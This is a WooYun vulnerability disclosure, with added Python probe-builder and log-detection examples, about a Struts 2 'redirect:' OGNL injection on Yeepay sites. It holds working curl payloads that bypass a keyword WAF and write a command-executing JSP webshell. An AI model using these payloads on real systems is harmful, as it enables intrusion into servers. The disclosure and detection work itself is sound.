Vulnerability summary

Defect ID: wooyun-2014-088006

Title: Improper fix of a Yeepay (易宝支付) vulnerability allows GETSHELL

Vendor: Yeepay (易宝支付)

Author: loopx9

Submitted: 2014-12-21 10:17

Fixed: 2015-02-04 10:18

Published: 2015-02-04 10:18

Type: system/service patches not applied in time

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-12-21: details sent to the vendor, awaiting vendor action
2014-12-24: vendor confirmed; details disclosed to the vendor only
2015-01-03: details disclosed to core white hats and domain experts
2015-01-13: details disclosed to regular white hats
2015-01-23: details disclosed to intern white hats
2015-02-04: details disclosed to the public

Summary:

Affects applications under the www domain.

Details:

http://www.yeepay.com/individualservice/Login.action
Seeing the .action suffix, out of habit I tested for the Struts vulnerability: http://www.yeepay.com/individualservice/Login.action?redirect:/xxoo

HTTP/1.1 302 Moved Temporarily
Server: Tengine/2.0.3
Date: Sat, 20 Dec 2014 08:34:12 GMT
Content-Length: 0
Connection: keep-alive
Location: http://www.yeepay.com/individualservice/xxoo
Content-Language: zh-CN
Set-Cookie: BIGipServerpool_css=2736695488.36895.0000; expires=Sat, 20-Dec-2014 8:49:12 GMT; path=/

Oh, it redirected, so there was hope; I went straight for the command-execution exploit, but in the end found it was blocked by the WAF.

[screenshot: 403.png]


Not ready to give up, I kept going. Testing showed the WAF filtered allowStaticMethodAccess and processBuilder, so command execution was hopeless; I tried whether a shell could be written instead.
http://www.yeepay.com/individualservice/Login.action?java.io.File ---> is OK
http://www.yeepay.com/individualservice/Login.action?java.io.PrintWriter ---> is OK
File operations are allowed, so it seems rules were added only for keywords extracted from the command-execution exploits, and File operations are let through. Now on to writing the shell.
0x1 Finding the web directory
org.apache.catalina.jsp_classpath contains the project's deployment path, which can be extracted from it. Because Yeepay's web container is JBoss, there appears to be a limit on URL length, so the value has to be taken in slices (a local Tomcat test had no such limit). Look up the position of individualservice:

http://www.yeepay.com/individualservice/Login.action?redirect:${%23application.get(%27org.apache.catalina.jsp_classpath%27).indexOf(%22individualservice%22)}
HTTP/1.1 302 Moved Temporarily
Server: Tengine/2.0.3
Date: Sat, 20 Dec 2014 08:55:06 GMT
Content-Length: 0
Connection: keep-alive
Location: http://www.yeepay.com/individualservice/8232
Content-Language: zh-CN

The position is 8232; adjust the substring range accordingly:

curl -i http://www.yeepay.com/individualservice/Login.action -d 'redirect:${%23application.get(%27org.apache.catalina.jsp_classpath%27).substring(8100,8400)}'
HTTP/1.1 302 Moved Temporarily
Server: Tengine/2.0.3
Date: Sat, 20 Dec 2014 10:01:42 GMT
Content-Length: 0
Connection: keep-alive
Location: http://www.yeepay.com/individualservice/efault/tmp/deploy/tmp4813126319445231330servlets-default.jar:/export/home/jboss-4.0.3SP1/server/default/deploy/jbossweb-tomcat55.sar/:/export/home/jboss-4.0.3SP1/server/default/deploy/individualservice.war/:/export/home/jboss-4.0.3SP1/lib/gnu-regexp.jar:/export/home/jboss-4.0.3SP1/server/default/lib
Content-Language: zh-CN
Set-Cookie: BIGipServerpool_css=186558656.36895.0000; expires=Sat, 20-Dec-2014 10:16:42 GMT; path=/

Web directory found: /export/home/jboss-4.0.3SP1/server/default/deploy/individualservice.war
0x2 Writing the shell

curl  -i 'http://www.yeepay.com/individualservice/Login.action'  -d 'redirect:${(%23a%3d(new%20java.io.PrintWriter(%22/export/home/jboss-4.0.3SP1/server/default/deploy/individualservice.war/lala.jsp%22)),%23a.write(%27%3C%25%40%20page%20import%3D%22java.io.*%22%20%25%3E%20%3C%25%20String%20cmd%20%3D%20request.getParameter(%22cmd%22)%3B%20String%20output%20%3D%20%22%22%3B%20if(cmd%20!%3D%20null)%20%7B%20String%20s%20%3D%20null%3B%20try%20%7B%20Process%20p%20%3D%20Runtime.getRuntime().exec(cmd)%3B%20BufferedReader%20sI%20%3D%20new%20BufferedReader(new%20InputStreamReader(p.getInputStream()))%3B%20while((s%20%3D%20sI.readLine())%20!%3D%20null)%20%7B%20output%20%2B%3D%20s%20%2B%22%5C%5Cr%5C%5Cn%22%3B%20%7D%20%7D%20catch(IOException%20e)%20%7B%20e.printStackTrace()%3B%20%7D%20%7D%20%25%3E%20%3Cpre%3E%20%3C%25%3Doutput%20%25%3E%20%3C%2Fpre%3E%27),%23a.close())%2b%23a}'
HTTP/1.1 302 Moved Temporarily
Server: Tengine/2.0.3
Date: Sat, 20 Dec 2014 10:04:00 GMT
Content-Length: 0
Connection: keep-alive
Location: http://www.yeepay.com/individualservice/nulljava.io.PrintWriter@1517394
Content-Language: zh-CN
Set-Cookie: BIGipServerpool_css=2736695488.36895.0000; expires=Sat, 20-Dec-2014 10:19:00 GMT; path=/


Shell address: http://www.yeepay.com/individualservice/lala.jsp

[screenshot: id.png]

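The two-step walk through the classpath above (indexOf to find the position, then a bounded substring because JBoss truncates long redirect URLs) is easy to get wrong by hand. The following Python is an added example, not the reporter's tooling: it builds those probes and parses the reflected 302 responses offline. It assumes what the report shows, namely that the `redirect:` prefix is evaluated as OGNL (the Struts 2 prefix flaw S2-016 / CVE-2013-2251; that identification is mine, not the report's) and that the result comes back in the Location header. The HTTP responses embedded in it are copied from the report, the WAF token list is the one the reporter observed, and nothing is sent over the network.

```python
"""Probe builder and 302 parser for the redirect:-prefix OGNL walk above.

Added example, not the reporter's tooling. Assumes the `redirect:` prefix
is evaluated as OGNL and the result is reflected in a 302 Location header,
as the report shows. Sample responses are copied from the report.
"""
import urllib.parse

APP_NAME = "individualservice"
CLASSPATH_KEY = "org.apache.catalina.jsp_classpath"
# Tokens the reporter says the WAF matched on; everything else passed.
WAF_BLOCKED = ("allowStaticMethodAccess", "processBuilder")
# Left bare, as in the report's URLs; #, quotes and the rest get encoded.
_SAFE = "{}()/.,$"


def _encode(expr):
    return "redirect:" + urllib.parse.quote(expr, safe=_SAFE)


def marker_probe(marker="xxoo"):
    """Harmless first probe: does the action honour a `redirect:` prefix?"""
    return "redirect:/" + marker


def index_probe(app_name=APP_NAME):
    """OGNL: position of app_name inside the container's JSP classpath."""
    return _encode('${#application.get(\'%s\').indexOf("%s")}'
                   % (CLASSPATH_KEY, app_name))


def substring_window(index, width=300, lead=132):
    """Window around the index, kept small because the report notes JBoss
    truncates long redirect URLs. Defaults reproduce substring(8100,8400)
    for the report's index 8232."""
    start = max(0, index - lead)
    return start, start + width


def substring_probe(start, end):
    return _encode("${#application.get('%s').substring(%d,%d)}"
                   % (CLASSPATH_KEY, start, end))


def waf_hits(payload):
    """Which observed WAF tokens a payload would trip (case-insensitive)."""
    decoded = urllib.parse.unquote(payload).lower()
    return [t for t in WAF_BLOCKED if t.lower() in decoded]


def location_header(raw_response):
    """Location header value of a raw HTTP response, or None."""
    for line in raw_response.splitlines():
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "location":
            return value.strip()
    return None


def reflected_value(raw_response, base):
    """Whatever Struts appended to the action's base URL is the result of
    the evaluated expression."""
    loc = location_header(raw_response)
    if loc and loc.startswith(base):
        return loc[len(base):]
    return None


def deploy_dir(classpath_fragment, app_name=APP_NAME):
    """Exploded-war directory for app_name. The window may start mid-entry,
    so split on ':' (Unix classpath separator) and take the entry ending
    in <app>.war/."""
    for entry in classpath_fragment.split(":"):
        if entry.endswith(app_name + ".war/"):
            return entry.rstrip("/")
    return None


def write_confirmed(raw_response):
    """The report's tell that the PrintWriter expression ran: a Location
    ending in 'java.io.PrintWriter@<hash>' (null from close() followed by
    the string form of #a)."""
    return "java.io.PrintWriter@" in (location_header(raw_response) or "")


# Constructed sample input: the two responses copied from the report.
BASE = "http://www.yeepay.com/individualservice/"
INDEX_RESPONSE = (
    "HTTP/1.1 302 Moved Temporarily\r\n"
    "Server: Tengine/2.0.3\r\n"
    "Location: " + BASE + "8232\r\n")
SUBSTRING_RESPONSE = (
    "HTTP/1.1 302 Moved Temporarily\r\n"
    "Location: " + BASE +
    "efault/tmp/deploy/tmp4813126319445231330servlets-default.jar:"
    "/export/home/jboss-4.0.3SP1/server/default/deploy/jbossweb-tomcat55.sar/:"
    "/export/home/jboss-4.0.3SP1/server/default/deploy/individualservice.war/:"
    "/export/home/jboss-4.0.3SP1/lib/gnu-regexp.jar:"
    "/export/home/jboss-4.0.3SP1/server/default/lib\r\n")


def locate_web_root(index_response=INDEX_RESPONSE,
                    substring_response=SUBSTRING_RESPONSE, base=BASE):
    """Replay the report's two-step walk on the captured responses."""
    index = int(reflected_value(index_response, base))
    start, end = substring_window(index)
    return {
        "index": index,
        "window": (start, end),
        "next_probe": substring_probe(start, end),
        "web_root": deploy_dir(reflected_value(substring_response, base)),
    }


if __name__ == "__main__":
    print(locate_web_root())
    print("WAF tokens in index probe:", waf_hits(index_probe()))
```

The probe strings it produces are byte-for-byte the ones in the report's requests, and `waf_hits` returning an empty list for them is the whole story of the bypass: a keyword rule built from the public command-execution exploits never sees `java.io.PrintWriter`.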

Other site applications with the same problem:

http://www.yeepay.com/selfservice/requestRegister.action
http://m.yeepay.com/donategroup/PrintDonateCert.action
http://gongyi.yeepay.com/mlove/showMediaInfo.action
http://zht.yeepay.com/zhtservice/login.action

Proof of vulnerability:

http://www.yeepay.com/individualservice/lala.jsp?cmd=id

[screenshot: id.png]


http://zht.yeepay.com/zhtservice/lala.jsp?cmd=/sbin/ifconfig

[screenshot: zht.png]


http://m.yeepay.com/boss_donategroup/test.txt
http://m.yeepay.com/donategroup/test.txt

[screenshot: test.png]

Fix recommendation:

Fix it soon. During testing I wrote only the one lala.jsp, which I did not delete. No data was touched.

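The point of this report for defenders is that the WAF matched on two keywords lifted from the public command-execution exploits (allowStaticMethodAccess, processBuilder) and let a structurally identical payload through. As an added example, not from the report or the vendor, the following Python scans constructed access-log lines in combined log format (an assumption about the deployment; the report shows responses, not logs) and flags a `redirect:`, `redirectAction:` or `action:` prefix carrying an OGNL expression regardless of which classes the expression references, alongside the keyword rule for comparison. Only the request line is inspected, so POST bodies like the report's `curl -d` requests would need request-body logging to be caught this way.

```python
"""Log-side detection for redirect:-prefix OGNL injection.

Added example, not from the report or the vendor. Input is constructed
access-log lines in combined format (an assumption about the deployment).
Only the request line is visible, so POST bodies like the report's
`curl -d` requests need request-body logging to be caught this way.
"""
import re
import urllib.parse

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]+" (?P<status>\d{3}) \S+')

# The WAF as the reporter describes it: two tokens lifted from public
# command-execution exploits.
KEYWORD_RULE = re.compile(r"allowStaticMethodAccess|processBuilder", re.I)
# Structural rules: a Struts result prefix, and that prefix followed by the
# start of an OGNL expression, whatever classes the expression goes on to use.
PREFIX_RULE = re.compile(r"[?&](?:redirect|redirectAction|action):", re.I)
STRUCT_RULE = re.compile(
    r"[?&](?:redirect|redirectAction|action):[^&]*?(?:\$\{|%\{|#)", re.I)
# Follow-up activity: a JSP taking a cmd= parameter, the shape of the
# report's dropped shell.
WEBSHELL_RULE = re.compile(r"[?&]cmd=", re.I)


def decode(target, rounds=3):
    """Percent-decode until stable so double-encoded probes normalise."""
    for _ in range(rounds):
        nxt = urllib.parse.unquote(target)
        if nxt == target:
            break
        target = nxt
    return target


def classify(line):
    """Finding dict for one log line, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = decode(m.group("target"))
    path, _, query = target.partition("?")
    q = "?" + query
    finding = {
        "ip": m.group("ip"), "path": path, "status": m.group("status"),
        "verdict": "clean",
        "keyword_rule_hit": bool(KEYWORD_RULE.search(target)),
    }
    if path.endswith(".action") and STRUCT_RULE.search(q):
        finding["verdict"] = "ognl_injection"
    elif path.endswith(".action") and PREFIX_RULE.search(q):
        finding["verdict"] = "redirect_prefix_probe"
    elif path.endswith(".jsp") and WEBSHELL_RULE.search(q):
        finding["verdict"] = "webshell_command"
    return finding


def scan(lines):
    """Findings for every line that is not clean."""
    return [f for f in map(classify, lines) if f and f["verdict"] != "clean"]


# Constructed sample log: paths and payload shapes follow the report; the
# client addresses and the /tmp/x.jsp target are invented.
SAMPLE_LOG = [
    '1.2.3.4 - - [20/Dec/2014:08:34:12 +0000] "GET /individualservice/'
    'Login.action?redirect:/xxoo HTTP/1.1" 302 0',
    '1.2.3.4 - - [20/Dec/2014:08:55:06 +0000] "GET /individualservice/'
    'Login.action?redirect:${%23application.get(%27org.apache.catalina.'
    'jsp_classpath%27).indexOf(%22individualservice%22)} HTTP/1.1" 302 0',
    '1.2.3.4 - - [20/Dec/2014:10:04:00 +0000] "GET /individualservice/'
    'Login.action?redirect:${(%23a%3d(new%20java.io.PrintWriter(%22/tmp/'
    'x.jsp%22)),%23a.close())%2b%23a} HTTP/1.1" 302 0',
    '5.6.7.8 - - [20/Dec/2014:10:05:00 +0000] "GET /individualservice/'
    'Login.action?username=alice HTTP/1.1" 200 1532',
    '5.6.7.8 - - [20/Dec/2014:10:06:00 +0000] "GET /individualservice/'
    'lala.jsp?cmd=id HTTP/1.1" 200 87',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["verdict"], "keyword_rule_hit=%s" % f["keyword_rule_hit"],
              f["path"])
```

On the sample, the PrintWriter line is flagged by the structural rule while `keyword_rule_hit` stays False, which is exactly the gap the reporter walked through. A 302 on an `.action` request whose Location echoes something other than a known route is the response-side confirmation, but that needs the Location header in the log, which combined format does not record.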
Copyright: please credit loopx9@WooYun when reposting


Vendor response

Vendor reply:

Severity: High

Rank: 20

Confirmed: 2014-12-24 14:41

Vendor comment:

The code has been through many years of wind and rain, patched over and over, and the occasional leak is hard to avoid. Thanks to the white hat for the submission; it gives us strong impetus to push our security remediation forward.

Latest status:

None yet